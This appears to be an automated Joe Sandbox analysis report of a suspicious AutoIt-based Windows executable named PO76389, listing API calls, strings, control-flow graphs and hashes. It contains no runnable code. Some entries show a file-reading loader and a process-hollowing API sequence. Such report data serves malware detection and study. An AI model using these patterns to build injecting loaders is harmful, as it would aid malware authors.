                                                    • Opcode Fuzzy Hash: b2b4b155bc7b3677dbe0a0c0e2b0ac8107976e076b1eb7a3dbf501af5b168be3
                                                    • Instruction Fuzzy Hash: 0121C3B5900718AFDB109FA8F989BCDBBF4FB18704F00411AF615A62A0D7B44588EFA5

                                                    Control-flow Graph

                                                    control_flow_graph 1156 4b3dcb-4b3df1 call 4b3f9b 1159 5239f9-523a09 call 4fcc82 1156->1159 1160 4b3df7-4b3e04 call 4b3f9b 1156->1160 1164 523a0e-523a10 1159->1164 1160->1159 1165 4b3e0a-4b3e10 1160->1165 1166 523a12-523a15 call 4b3e39 1164->1166 1167 523a2f-523a77 call 4d010a 1164->1167 1169 523a1a-523a29 call 4f757b 1165->1169 1170 4b3e16-4b3e36 call 4bbdf0 1165->1170 1166->1169 1176 523a98 1167->1176 1177 523a79-523a96 call 4cac65 1167->1177 1169->1167 1180 523a9a-523aad 1176->1180 1177->1180 1182 523ab3 1180->1182 1183 523c24-523c27 call 4d28ca 1180->1183 1185 523aba-523abd call 4f3460 1182->1185 1186 523c2c-523c35 call 4b3e39 1183->1186 1189 523ac2-523ae4 call 4bb7ff call 4fa5be 1185->1189 1192 523c37-523c47 call 4b5800 call 4fa46f 1186->1192 1198 523ae6-523af3 1189->1198 1199 523af8-523b02 call 4fa5a8 1189->1199 1206 523c4c-523c7c call 4f32b0 call 4d017e call 4d28ca call 4b3e39 1192->1206 1201 523beb-523bfb call 4bb6d0 1198->1201 1208 523b04-523b17 1199->1208 1209 523b1c-523b26 call 4fa592 1199->1209 1201->1189 1211 523c01-523c0b call 4ba870 1201->1211 1206->1192 1208->1201 1218 523b3a-523b44 call 4cdf5b 1209->1218 1219 523b28-523b35 1209->1219 1217 523c10-523c1e 1211->1217 1217->1183 1217->1185 1218->1201 1225 523b4a-523b62 call 4f30ac 1218->1225 1219->1201 1230 523b64-523b83 call 4bcaee call 4b5cd3 1225->1230 1231 523b85-523b88 1225->1231 1254 523ba6-523bb4 call 4bb7ff 1230->1254 1233 523bb6-523bb9 1231->1233 1234 523b8a-523ba5 call 4bcaee call 4f34b4 call 4b5cd3 1231->1234 1236 523bbb-523bc4 call 4f2fcd 1233->1236 1237 523bd9-523bdc call 4fa525 1233->1237 1234->1254 1236->1206 1247 523bca-523bd4 call 4d017e 1236->1247 1244 523be1-523bea call 4d017e 1237->1244 1244->1201 1247->1189 1254->1244
                                                    APIs
                                                      • Part of subcall function 004B3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004B34E2,?,00000001), ref: 004B3FCD
                                                    • _free.LIBCMT ref: 00523C27
                                                    • _free.LIBCMT ref: 00523C6E
                                                      • Part of subcall function 004BBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,005722E8,?,00000000,?,004B3E2E,?,00000000,?,0054DBF0,00000000,?), ref: 004BBE8B
                                                      • Part of subcall function 004BBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,004B3E2E,?,00000000,?,0054DBF0,00000000,?,00000002), ref: 004BBEA7
                                                      • Part of subcall function 004BBDF0: __wsplitpath.LIBCMT ref: 004BBF19
                                                      • Part of subcall function 004BBDF0: _wcscpy.LIBCMT ref: 004BBF31
                                                      • Part of subcall function 004BBDF0: _wcscat.LIBCMT ref: 004BBF46
                                                      • Part of subcall function 004BBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 004BBF56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<K$G-K
                                                    • API String ID: 1510338132-2902009562
                                                    • Opcode ID: 6dbb5d636c18b06a45701bf74a1571ad732cc16841ba02cab5a83b6d3395ee84
                                                    • Instruction ID: d2686bafdee55e7188707ecc92c7b46ba45e59163185f7c322b019cabefcc3d7
                                                    • Opcode Fuzzy Hash: 6dbb5d636c18b06a45701bf74a1571ad732cc16841ba02cab5a83b6d3395ee84
                                                    • Instruction Fuzzy Hash: A3917F71910229AFCF04EFA5DC919EEBBB4FF09314F14442EF416AB291DB789A05CB64

                                                    Control-flow Graph

                                                    [Control-flow graph image not recoverable. Function at 00DA19D8, basic blocks 00DA19D8 to 00DA1CDA; API calls on the graph: CreateFileW, VirtualAlloc (twice), ReadFile, CloseHandle, VirtualFree (twice); subcalls 00D9F398, 00DA28E8, 00DA2B38, 00DA2948. Executed and not-executed blocks were distinguished by colour in the original graph.]
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00DA1AA9
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DA1CCF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateFileFreeVirtual
                                                    • String ID:
                                                    • API String ID: 204039940-0
                                                    • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                    • Instruction ID: 2283dd478d41de034eb055ff4b8fe536113dcec5001026e7e39ed7df0db28621
                                                    • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                    • Instruction Fuzzy Hash: FAA12578E40209EBDB14CFA4C988BEEBBB5FF49314F248159E101BB280D7759A81CF64

                                                    Control-flow Graph

                                                    [Control-flow graph image not recoverable. Function at 004CEB05, basic blocks 004CEB05 to 00524B9A; API calls on the graph: RegOpenKeyExW, RegQueryValueExW (twice), RegCloseKey; subcalls 004BC4CD, 004D010A, 004B4BCE, 004B7E53, 004B4FD2. Executed and not-executed blocks were distinguished by colour in the original graph.]
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,004CEADA,?,?), ref: 004CEB27
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,004CEADA,?,?), ref: 00524B26
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,004CEADA,?,?), ref: 00524B65
                                                    • RegCloseKey.ADVAPI32(?,?,004CEADA,?,?), ref: 00524B94
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                    • API String ID: 1586453840-614718249
                                                    • Opcode ID: 803aed0ddcf822889da7b60ad32da45f92e22f792fe535321295db6d8679d21a
                                                    • Instruction ID: 8b9ab2b3bd5058fdcdece07f59c9dea5b49bbf76514ea8e88d0d86418c00e9fb
                                                    • Opcode Fuzzy Hash: 803aed0ddcf822889da7b60ad32da45f92e22f792fe535321295db6d8679d21a
                                                    • Instruction Fuzzy Hash: 85114C71600118BEEB04DBA4DD8AEFE7BBCEF04758F10005AF506E6191EA70AE05EB64

                                                    Control-flow Graph

                                                    [Control-flow graph image not recoverable. Single basic block 004B2E9D to 004B2F0D; API calls on the graph: CreateWindowExW (twice), ShowWindow (twice).]
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004B2ECB
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B2EEC
                                                    • ShowWindow.USER32(00000000), ref: 004B2F00
                                                    • ShowWindow.USER32(00000000), ref: 004B2F09
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 690b7cd8561ebf0db84caecbba5776065c0dec21c8e5abf1711fbddf4147d1f3
                                                    • Instruction ID: 65594ccbcf78364c212333c8bd16966341ffd63cb05eddffef7f75abd1f56908
                                                    • Opcode Fuzzy Hash: 690b7cd8561ebf0db84caecbba5776065c0dec21c8e5abf1711fbddf4147d1f3
                                                    • Instruction Fuzzy Hash: 0CF030715406D07BD730676B7C0DE672E7DE7D6F10B01401EBA0892260C16108DDFA78
                                                    APIs
                                                      • Part of subcall function 00DA1638: Sleep.KERNEL32(000001F4), ref: 00DA1649
                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00DA18C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: JQ5R94PILMVURJ4M0HA5S
                                                    • API String ID: 2694422964-3514039230
                                                    • Opcode ID: 380704c52e1721c1b7d4378b22b8126d48c71959318d967801cadf354f0a83d4
                                                    • Instruction ID: f859a1f25feadd0590f73a4490bd7c6cced62b6c1c1f3da77e2ccb6f6813e6a4
                                                    • Opcode Fuzzy Hash: 380704c52e1721c1b7d4378b22b8126d48c71959318d967801cadf354f0a83d4
                                                    • Instruction Fuzzy Hash: 09619F34E0424CDAEF11DBA4D8547EFBB79EF59300F044199E208BB2C1D6BA5A45CBB6
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0052454E
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • _memset.LIBCMT ref: 004B3965
                                                    • _wcscpy.LIBCMT ref: 004B39B5
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004B39C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 3942752672-1585850449
                                                    • Opcode ID: 4682a574edca34c7c1ef5e48683160fb1660a44ef71001ff3a45fdfb06fea1ef
                                                    • Instruction ID: 3ae5d0a30d949020e42968ce22a0d4b12ca8ca4d54144ec5da6853e11dadd9f3
                                                    • Opcode Fuzzy Hash: 4682a574edca34c7c1ef5e48683160fb1660a44ef71001ff3a45fdfb06fea1ef
                                                    • Instruction Fuzzy Hash: 1231D5B1108340ABD721EF55DC45FDB7BE8AF54315F00451FF189821A1DB78AA8CEBAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: dEV
                                                    • API String ID: 0-3214538095
                                                    • Opcode ID: b371fdfe2bcbd0a09fe8839890b3e70a550311d610017f2ab26b8fe21406d15c
                                                    • Instruction ID: 5ebbed624243d763ebd0dc42492f266a65792927744d822573edd6655716f44f
                                                    • Opcode Fuzzy Hash: b371fdfe2bcbd0a09fe8839890b3e70a550311d610017f2ab26b8fe21406d15c
                                                    • Instruction Fuzzy Hash: B1F17A716083019FD720DF24C985B5EBBE5FF88314F14892EF9998B292D774E945CB82
                                                    APIs
                                                    • SHGetMalloc.SHELL32(1<K), ref: 004B3A7D
                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 004B3AD2
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 004B3A8F
                                                      • Part of subcall function 004B3B1E: _wcsncpy.LIBCMT ref: 004B3B32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                    • String ID: 1<K
                                                    • API String ID: 3981382179-1209382738
                                                    • Opcode ID: 23ca5b2428c4a13f6c40432c37653c37463e81409bf642f5d34f830c9e76d3ce
                                                    • Instruction ID: 5f8de176e659bb12bbc1c2185ec26dc1cc51a1932b5c9bf298b0dea110f5039b
                                                    • Opcode Fuzzy Hash: 23ca5b2428c4a13f6c40432c37653c37463e81409bf642f5d34f830c9e76d3ce
                                                    • Instruction Fuzzy Hash: FA21AF32B00114ABCB10DF96DC84DEEBBBDEF88701B104099F509DB245DB70AE46CBA4
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004CC948,SwapMouseButtons,00000004,?), ref: 004CC979
                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004CC948,SwapMouseButtons,00000004,?,?,?,?,004CBF22), ref: 004CC99A
                                                    • RegCloseKey.KERNEL32(00000000,?,?,004CC948,SwapMouseButtons,00000004,?,?,?,?,004CBF22), ref: 004CC9BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 6bfff319a6176129b6c33ce23709c825cd6a54dc57dea133cb3c740e17c445d5
                                                    • Instruction ID: e7bea402613a1a70af3018bb16fa1e1442938389c9841114ee7ef32e9254c565
                                                    • Opcode Fuzzy Hash: 6bfff319a6176129b6c33ce23709c825cd6a54dc57dea133cb3c740e17c445d5
                                                    • Instruction Fuzzy Hash: 29117CB9511208BFDB608F64DC84EAF7BB8EF14740F00441AE849E7210E231AE55AB64
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,00000000), ref: 00DA0DF3
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00DA0E89
                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00DA0EAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                    • Instruction ID: 0c443f241f25992a0847ce1934e2048bb71c6ab524acb73f0883da0f7e819a74
                                                    • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                    • Instruction Fuzzy Hash: 0C620D34A14258DBEB24CFA4C841BDEB776EF59300F1091A9D10DEB390E7799E81CB69
                                                    APIs
                                                      • Part of subcall function 004B16F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 004B1751
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004B159B
                                                    • CoInitialize.OLE32(00000000), ref: 004B1612
                                                    • CloseHandle.KERNEL32(00000000), ref: 005258F7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                    • String ID: '/O
                                                    • API String ID: 458326420-909962523
APIs
  • Part of subcall function 004B41A7: _fseek.LIBCMT ref: 004B41BF
  • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF49
  • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF5C
• _free.LIBCMT ref: 004FCDC9
• _free.LIBCMT ref: 004FCDD0
• _free.LIBCMT ref: 004FCE3B
  • Part of subcall function 004D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28DE
  • Part of subcall function 004D28CA: GetLastError.KERNEL32(00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28F0
• _free.LIBCMT ref: 004FCE43
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
APIs
  • Part of subcall function 004D45EC: __FF_MSGBANNER.LIBCMT ref: 004D4603
  • Part of subcall function 004D45EC: __NMSG_WRITE.LIBCMT ref: 004D460A
  • Part of subcall function 004D45EC: RtlAllocateHeap.NTDLL(00D50000,00000000,00000001), ref: 004D462F
• std::exception::exception.LIBCMT ref: 004D013E
• __CxxThrowException@8.LIBCMT ref: 004D0153
  • Part of subcall function 004D7495: RaiseException.KERNEL32(?,?,004B125D,00566598,?,?,?,004D0158,004B125D,00566598,?,00000001), ref: 004D74E6
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID: bad allocation
• API String ID: 3902256705-2104205924
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 004FD01E
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 004FD035
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
APIs
• _memset.LIBCMT ref: 004B35BE
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 004B3667
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
APIs
• __FF_MSGBANNER.LIBCMT ref: 004D4603
  • Part of subcall function 004D8E52: __NMSG_WRITE.LIBCMT ref: 004D8E79
  • Part of subcall function 004D8E52: __NMSG_WRITE.LIBCMT ref: 004D8E83
• __NMSG_WRITE.LIBCMT ref: 004D460A
  • Part of subcall function 004D8EB2: GetModuleFileNameW.KERNEL32(00000000,00570312,00000104,?,00000001,004D0127), ref: 004D8F44
  • Part of subcall function 004D8EB2: ___crtMessageBoxW.LIBCMT ref: 004D8FF2
  • Part of subcall function 004D1D65: ___crtCorExitProcess.LIBCMT ref: 004D1D6B
  • Part of subcall function 004D1D65: ExitProcess.KERNEL32 ref: 004D1D74
  • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
• RtlAllocateHeap.NTDLL(00D50000,00000000,00000001), ref: 004D462F
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
